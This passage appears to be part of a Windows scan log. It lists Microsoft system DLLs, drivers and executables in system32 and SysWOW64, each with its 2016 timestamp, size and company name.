2016-09-15 05:01 - 2016-09-15 05:01 - 00650240 _____ (Microsoft) C:\WINDOWS\system32\DbgModel.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00642048 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.InkControls.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00640976 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\evr.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00640000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MCRecvSrc.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00635904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9diag.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00627200 _____ (Microsoft Corporation) C:\WINDOWS\system32\uReFS.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00619368 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\cng.sys 2016-09-15 05:01 - 2016-09-15 05:01 - 00611328 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Graphics.Printing.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00605184 _____ (Microsoft Corporation) C:\WINDOWS\system32\bcastdvr.exe 2016-09-15 05:01 - 2016-09-15 05:01 - 00601200 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\oleaut32.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00595488 _____ (Microsoft Corporation) C:\WINDOWS\system32\mf.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00592384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\GamePanel.exe 2016-09-15 05:01 - 2016-09-15 05:01 - 00590952 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioSes.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00590848 _____ (Microsoft Corporation) C:\WINDOWS\system32\vbscript.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00587968 _____ (Microsoft Corporation) C:\WINDOWS\system32\generaltel.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00584544 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingSyncHost.exe 2016-09-15 05:01 - 2016-09-15 05:01 - 00575488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\qdvd.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00568832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Speech.UXRes.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00568832 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Speech.UXRes.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00558080 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\clusapi.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00554496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\StoreAgent.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00552288 _____ (Microsoft Corporation) C:\WINDOWS\system32\devinv.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00544768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\uReFS.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00540160 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingSync.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00539136 _____ (Microsoft Corporation) C:\WINDOWS\system32\usocore.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00538112 _____ (Microsoft Corporation) C:\WINDOWS\system32\sppcext.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00536576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\BingOnlineServices.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00529928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mf.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00526848 _____ (Microsoft Corporation) C:\WINDOWS\system32\OneDriveSettingSyncProvider.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00523712 _____ (Microsoft Corporation) C:\WINDOWS\system32\DMRServer.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00521728 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusUpdateHandlers.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00520192 _____ (Microsoft Corporation) C:\WINDOWS\system32\w32time.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00509952 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_Bluetooth.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00509792 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SettingSyncHost.exe 2016-09-15 05:01 - 2016-09-15 05:01 - 00508416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\vbscript.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00500224 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Graphics.Printing.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00498688 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LogonController.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00495104 _____ (Microsoft Corporation) C:\WINDOWS\system32\DataSenseHandlers.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00491520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\bcastdvr.exe 2016-09-15 05:01 - 2016-09-15 05:01 - 00484584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AudioSes.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00484352 _____ (Microsoft Corporation) C:\WINDOWS\system32\MDEServer.exe 2016-09-15 05:01 - 2016-09-15 05:01 - 00483840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CoreMessaging.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00476672 _____ (Microsoft Corporation) C:\WINDOWS\system32\schannel.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00471552 _____ (Microsoft Corporation) C:\WINDOWS\system32\DscCore.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00468992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.InkControls.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00468992 _____ (Microsoft Corporation) C:\WINDOWS\system32\wwanconn.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00466432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\sppcext.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00462336 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlansec.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00461312 _____ (Microsoft) C:\WINDOWS\SysWOW64\DbgModel.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00461312 _____ (Microsoft Corporation) C:\WINDOWS\system32\CredProvDataModel.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00458752 _____ (Microsoft Corporation) C:\WINDOWS\system32\RTMediaFrame.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00450392 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb.sys 2016-09-15 05:01 - 2016-09-15 05:01 - 00447488 _____ (Microsoft Corporation) C:\WINDOWS\system32\das.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00446464 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapConfiguration.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00444416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SettingSync.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00442368 _____ (Microsoft Corporation) C:\WINDOWS\system32\PlayToDevice.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00438784 _____ (Microsoft Corporation) C:\WINDOWS\system32\EncDec.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00435040 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\rdbss.sys 2016-09-15 05:01 - 2016-09-15 05:01 - 00432128 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpAXHolder.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00426496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\OneDriveSettingSyncProvider.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00423776 _____ (Microsoft Corporation) C:\WINDOWS\system32\wifitask.exe 2016-09-15 05:01 - 2016-09-15 05:01 - 00418304 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.BlockedShutdown.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00412160 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlanmsm.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00410624 _____ (Microsoft Corporation) C:\WINDOWS\system32\facecredentialprovider.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00409944 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\FWPKCLNT.SYS 2016-09-15 05:01 - 2016-09-15 05:01 - 00409088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MosResource.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00409088 _____ (Microsoft Corporation) C:\WINDOWS\system32\MosResource.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00409088 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\srv.sys 2016-09-15 05:01 - 2016-09-15 05:01 - 00408600 _____ (Microsoft Corporation) C:\WINDOWS\system32\tsmf.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00405344 _____ (Microsoft Corporation) C:\WINDOWS\system32\msv1_0.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00402272 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms1.sys 2016-09-15 05:01 - 2016-09-15 05:01 - 00396800 _____ (Microsoft Corporation) C:\WINDOWS\system32\StorSvc.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00396168 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlanapi.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00391168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CredProvDataModel.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00391168 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuuhext.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00389632 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\schannel.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00389000 _____ (Microsoft Corporation) C:\WINDOWS\system32\wevtapi.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00387584 _____ (Microsoft Corporation) C:\WINDOWS\system32\iedkcs32.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00382272 _____ (Microsoft Corporation) C:\WINDOWS\system32\LockAppHost.exe 2016-09-15 05:01 - 2016-09-15 05:01 - 00380928 _____ (Microsoft Corporation) C:\WINDOWS\system32\wincorlib.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00379744 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\Classpnp.sys 2016-09-15 05:01 - 2016-09-15 05:01 - 00374784 _____ (Microsoft Corporation) C:\WINDOWS\system32\resutils.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00366592 _____ (Microsoft Corporation) C:\WINDOWS\system32\NmaDirect.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00363520 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.BioFeedback.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00361096 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tsmf.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00360040 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemSettingsAdminFlows.exe 2016-09-15 05:01 - 2016-09-15 05:01 - 00358912 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00355328 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\RTMediaFrame.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00354264 _____ (Microsoft Corporation) C:\WINDOWS\system32\systemreset.exe 2016-09-15 05:01 - 2016-09-15 05:01 - 00349184 _____ (Microsoft Corporation) C:\WINDOWS\system32\provengine.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00343040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PlayToDevice.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00340832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msv1_0.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00340480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iedkcs32.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00331264 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MapConfiguration.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00327680 _____ (Microsoft Corporation) C:\WINDOWS\system32\container.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00327168 _____ (Microsoft Corporation) C:\WINDOWS\system32\eapp3hst.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00324608 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.LockScreen.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00323584 _____ (Microsoft Corporation) C:\WINDOWS\system32\domgmt.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00321792 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LockAppHost.exe 2016-09-15 05:01 - 2016-09-15 05:01 - 00320000 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.Store.TestingFramework.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00315904 _____ (Microsoft Corporation) C:\WINDOWS\system32\Phoneutil.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00314880 _____ (Microsoft Corporation) C:\WINDOWS\system32\FSClient.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00313856 _____ (Microsoft Corporation) C:\WINDOWS\system32\moshostcore.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00313560 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wlanapi.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00303968 _____ (Microsoft Corporation) C:\WINDOWS\system32\invagent.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00302592 _____ (Microsoft Corporation) C:\WINDOWS\system32\eapphost.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00298496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\resutils.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00298496 _____ (Microsoft Corporation) C:\WINDOWS\system32\wifiprofilessettinghandler.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00297552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wevtapi.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00295424 _____ (Microsoft Corporation) C:\WINDOWS\system32\provhandlers.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00295424 _____ (Microsoft Corporation) C:\WINDOWS\system32\dlnashext.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00295424 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudBackupSettings.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00294912 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfsensorgroup.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00289792 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeveloperOptionsSettingsHandlers.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00289280 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\NmaDirect.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00288768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wincorlib.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00285184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.BlockedShutdown.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00284672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00282624 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb10.sys 2016-09-15 05:01 - 2016-09-15 05:01 - 00280064 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_WorkAccess.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00279904 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\sdbus.sys 2016-09-15 05:01 - 2016-09-15 05:01 - 00279552 _____ (Microsoft Corporation) C:\WINDOWS\system32\PlayToReceiver.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00268800 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfksproxy.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00268800 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceCensus.exe 2016-09-15 05:01 - 2016-09-15 05:01 - 00266240 _____ (Microsoft Corporation) C:\WINDOWS\system32\ConsoleLogon.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00263680 _____ (Microsoft Corporation) C:\WINDOWS\system32\ExSMime.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00261120 _____ (Microsoft Corporation) C:\WINDOWS\system32\indexeddbserver.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00260096 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Phoneutil.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00259584 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallAgentUserBroker.exe 2016-09-15 05:01 - 2016-09-15 05:01 - 00253952 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.BioFeedback.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00253952 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.Store.TestingFramework.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00248832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dlnashext.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00248320 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\srvnet.sys 2016-09-15 05:01 - 2016-09-15 05:01 - 00244816 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfps.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00243712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\eapp3hst.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00243712 _____ (Microsoft Corporation) C:\WINDOWS\system32\WinBioDataModel.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00243200 _____ (Microsoft Corporation) C:\WINDOWS\system32\eappcfg.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00239104 _____ (Microsoft Corporation) C:\WINDOWS\system32\dafpos.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00237568 _____ (Microsoft Corporation) C:\WINDOWS\system32\offlinesam.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00235008 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\eapphost.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00235008 _____ (Microsoft Corporation) C:\WINDOWS\system32\KnobsCore.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00234496 _____ (Microsoft Corporation) C:\WINDOWS\system32\tcpipcfg.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00231936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.LockScreen.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00231424 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CloudBackupSettings.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00231424 _____ (Microsoft Corporation) C:\WINDOWS\system32\shutdownux.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00227840 _____ (Microsoft Corporation) C:\WINDOWS\system32\cdd.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00227840 _____ (Microsoft Corporation) C:\WINDOWS\system32\C_G18030.DLL 2016-09-15 05:01 - 2016-09-15 05:01 - 00226304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\container.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00225280 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\C_G18030.DLL 2016-09-15 05:01 - 2016-09-15 05:01 - 00224256 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ExSMime.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00224096 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb20.sys 2016-09-15 05:01 - 2016-09-15 05:01 - 00223744 _____ (Microsoft Corporation) C:\WINDOWS\system32\ie4uinit.exe 2016-09-15 05:01 - 2016-09-15 05:01 - 00222720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallAgentUserBroker.exe 2016-09-15 05:01 - 2016-09-15 05:01 - 00220672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PlayToReceiver.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00220672 _____ (Microsoft Corporation) C:\WINDOWS\system32\provops.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00215040 _____ (Microsoft Corporation) C:\WINDOWS\system32\fveapibase.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00211456 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallAgent.exe 2016-09-15 05:01 - 2016-09-15 05:01 - 00210944 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32k.sys 2016-09-15 05:01 - 2016-09-15 05:01 - 00210432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\offlinesam.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00208896 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Internal.UI.Logon.ProxyStub.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00204288 _____ (Windows (R) Win 7 DDK provider) C:\WINDOWS\system32\DscCoreConfProv.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00203776 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXApplicabilityBlob.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00200704 _____ (Microsoft Corporation) C:\WINDOWS\system32\provisioningcsp.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00200704 _____ (Microsoft Corporation) C:\WINDOWS\system32\ClipboardServer.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00198656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\indexeddbserver.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00198144 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\FSClient.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00197120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\eappcfg.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00187904 _____ (Microsoft Corporation) C:\WINDOWS\system32\VCardParser.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00187232 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dumpsd.sys 2016-09-15 05:01 - 2016-09-15 05:01 - 00186880 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusNotification.exe 2016-09-15 05:01 - 2016-09-15 05:01 - 00184832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfksproxy.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00181760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tcpipcfg.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00181760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfsensorgroup.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00179712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallAgent.exe 2016-09-15 05:01 - 2016-09-15 05:01 - 00178528 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudExperienceHostUser.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00172528 _____ (Microsoft Corporation) C:\WINDOWS\system32\sspicli.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00171520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ClipboardServer.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00170496 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppCapture.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00168800 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ksecpkg.sys 2016-09-15 05:01 - 2016-09-15 05:01 - 00162850 _____ C:\WINDOWS\system32\C_932.NLS 2016-09-15 05:01 - 2016-09-15 05:01 - 00160096 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudExperienceHostBroker.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00157696 _____ (Microsoft Corporation) C:\WINDOWS\system32\XamlTileRender.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00156672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\BcastDVRHelper.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00156672 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\hidclass.sys 2016-09-15 05:01 - 2016-09-15 05:01 - 00151224 _____ (Microsoft Corporation) C:\WINDOWS\system32\acmigration.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00150528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\win32k.sys 2016-09-15 05:01 - 2016-09-15 05:01 - 00150528 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapsBtSvc.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00147456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\VCardParser.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00147456 _____ (Microsoft Corporation) C:\WINDOWS\system32\winsrv.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00141824 _____ (Windows (R) Win 7 DDK provider) C:\WINDOWS\SysWOW64\DscCoreConfProv.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00140288 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakrathunk.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00140288 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppointmentActivation.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00138240 _____ (Microsoft Corporation) C:\WINDOWS\system32\sppc.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00137728 _____ (Microsoft Corporation) C:\WINDOWS\system32\wificonnapi.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00136032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CloudExperienceHostUser.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00135168 _____ (Microsoft Corporation) C:\WINDOWS\system32\slc.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00133632 _____ (Microsoft Corporation) C:\WINDOWS\system32\MediaFoundation.DefaultPerceptionProvider.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00133472 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ksecdd.sys 2016-09-15 05:01 - 2016-09-15 05:01 - 00128352 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\partmgr.sys 2016-09-15 05:01 - 2016-09-15 05:01 - 00125952 _____ (Microsoft Corporation) C:\WINDOWS\system32\setupugc.exe 2016-09-15 05:01 - 2016-09-15 05:01 - 00123904 _____ (Microsoft Corporation) C:\WINDOWS\system32\samlib.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00121368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfps.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00121344 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakrathunk.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00119808 _____ (Microsoft Corporation) C:\WINDOWS\system32\KnobsCsp.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00118784 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataTimeUtil.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00118272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\slc.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00118272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppointmentActivation.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00118112 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\EhStorTcgDrv.sys 2016-09-15 05:01 - 2016-09-15 05:01 - 00117240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\sspicli.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00116224 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MapsBtSvc.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00115200 _____ (Microsoft Corporation) C:\WINDOWS\system32\IdCtrls.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00114688 _____ (Microsoft Corporation) C:\WINDOWS\system32\offlinelsa.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00114192 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32u.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00114176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\setupugc.exe 2016-09-15 05:01 - 2016-09-15 05:01 - 00110080 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Microsoft-Windows-MapControls.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00110080 _____ (Microsoft Corporation) 